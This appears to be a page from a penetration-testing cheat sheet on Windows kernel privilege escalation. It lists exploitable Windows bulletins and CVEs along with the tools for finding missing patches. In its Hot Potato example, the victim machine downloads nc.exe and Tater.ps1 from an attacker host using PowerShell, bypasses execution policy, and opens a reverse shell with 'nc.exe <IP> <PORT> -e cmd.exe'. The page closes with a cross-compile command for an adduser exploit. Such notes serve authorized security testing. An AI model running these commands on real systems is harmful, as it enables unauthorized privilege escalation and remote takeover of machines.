Kernel Exploitation

Run exploit suggester against systeminfo:

https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py

$ python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt

Find installed paths:

$ wmic qfe get Caption,Description,HotFixID,InstalledOn

List of exploits kernel : https://github.com/SecWiki/windows-kernel-exploits

#Security Bulletin #KB #Description #Operating System

  • MS17-017 [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8)

  • CVE-2017-8464 [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008)

  • CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)

  • CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)

  • CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)

  • MS17-010 [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)

  • MS16-135 [KB3199135]  [Windows Kernel Mode Drivers]  (2016)

  • MS16-111 [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)

  • MS16-098 [KB3178466]  [Kernel Driver]  (Win 8.1)

  • MS16-075 [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)

  • Example of Hot Potato explotation

Attacker: sudo python -m SimpleHTTPServer 80 sudo nc -lvp <PORT>

Victim: powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe') powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Tater.ps1.exe', '.\Tater.ps1.exe') powershell -exec bypass -command "& { Import-Module .\Tater.ps1; Invoke-Tater -Trigger 1 -Command '.\nc.exe <IP> <PORT> -e cmd.exe' }"

  • MS16-034 [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)

  • MS16-032 [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)

  • MS16-016 [KB3136041]  [WebDAV]  (2008/Vista/7)

  • MS16-014 [K3134228]  [remote code execution]  (2008/Vista/7) ...

  • MS03-026 [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)

To cross compile a program from Kali, use the following command.

Kali>i586-mingw32msvc-gcc -o adduser.exeuseradd.c

PreviousCommon Vulnerabilities and Exposure (CVE)NextNamed Pipes

Last updated